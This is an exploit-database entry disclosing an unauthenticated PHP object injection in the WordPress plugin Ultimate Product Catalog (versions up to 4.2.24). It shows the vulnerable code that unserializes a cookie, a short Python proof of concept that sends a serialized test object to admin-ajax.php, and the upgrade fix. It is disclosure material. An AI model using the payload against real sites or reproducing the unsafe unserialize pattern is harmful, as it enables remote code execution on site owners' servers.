WP Plugin Ultimate Product Catalog 4.2.24 PHP Object Injection

vendor:

Ultimate Product Catalog

by:

tomplixsee

9,8

CVSS

HIGH

PHP Object Injection

CWE

Product Name: Ultimate Product Catalog

Affected Version From: 4.2.23

Affected Version To: 4.2.24

Patch Exists: YES

Related CWE: NA

CPE: a:etoile_web_design:ultimate_product_catalog

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu Server 16.04

2017

WP Plugin Ultimate Product Catalog 4.2.24 PHP Object Injection

A PHP Object Injection vulnerability was discovered in the Ultimate Product Catalog plugin version 4.2.24 for WordPress. An attacker can exploit this vulnerability to execute arbitrary code on the server by sending a malicious cookie to the vulnerable function. This vulnerability can be exploited without authentication.

Mitigation:

Upgrade to version 4.2.25 or later of the Ultimate Product Catalog plugin.

Source

Exploit-DB raw data:

# Exploit Title: [WP Plugin Ultimate Product Catalog 4.2.24 PHP Object Injection]
# Google Dork: [NA]
# Date: [Okt 30 2017]
# Exploit Author: [tomplixsee]
# Author blog : [cupuzone.wordpress.com]
# Vendor Homepage: [http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/]
# Software Link: [https://wordpress.org/plugins/ultimate-product-catalogue/]
# Version: [<= 4.2.24] 
# Tested on: [Ubuntu Server 16.04]
# CVE : [NA]

tested on app version 4.2.23, 4.2.24

we can send an evil cookie (login not required) to vulnerable function
1. vulnerable code on Functions/Process_Ajax.php <= tested

   203 // Adds an item to the plugin's cart
   204 function UPCP_Add_To_Cart() {
   205 global $woocommerce;
   206 global $wpdb;
   207 global $items_table_name;
   208
   209 $WooCommerce_Checkout = get_option("UPCP_WooCommerce_Checkout");
   210
   211 if ($WooCommerce_Checkout == "Yes") {
   212 $WC_Prod_ID = $wpdb->get_var($wpdb->prepare("SELECT Item_WC_ID FROM $items_table_name WHERE Item_ID=%d", sanitize_text_field($_POST['prod_ID'])));
   213 echo "WC ID: " . $WC_Prod_ID . "<Br>";
   214 $woocommerce->cart->add_to_cart($WC_Prod_ID);
   215 }
   216
   217 if (isset($_COOKIE['upcp_cart_products'])) {
   218 $Products_Array = unserialize(str_replace('\"', '"', $_COOKIE['upcp_cart_products']));
   219 }
   220 else {
   221 $Products_Array = array();
   222 }
   223
   224 $Products_Array[] = $_POST['prod_ID'];
   225 $Products_Array = array_unique($Products_Array);
   226 setcookie('upcp_cart_products', serialize($Products_Array), time()+3600*24*3, "/");
   227 }
   228 add_action('wp_ajax_upcp_add_to_cart', 'UPCP_Add_To_Cart');
   229 add_action( 'wp_ajax_nopriv_upcp_add_to_cart', 'UPCP_Add_To_Cart' );

2. vulnerable code on Functions/Shortcodes.php <= not tested
  
POC
1. use a WP plugin to test php object injection, 
like this one https://www.pluginvulnerabilities.com/2017/07/24/wordpress-plugin-for-use-in-testing-for-php-object-injection/

2. make a request 
#-----------------------------------
#! /usr/bin/python
import requests
url = "http://vbox-ubuntu-server.me/wordpress/wp-admin/admin-ajax.php?";
data = {'action':'upcp_add_to_cart'}
headers = {
'Content-type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Cookie': 'upcp_cart_products=O:20:"PHP_Object_Injection":0:{}'
}
r = requests.post(url, data=data, headers=headers)

print r.content

#------------------------------------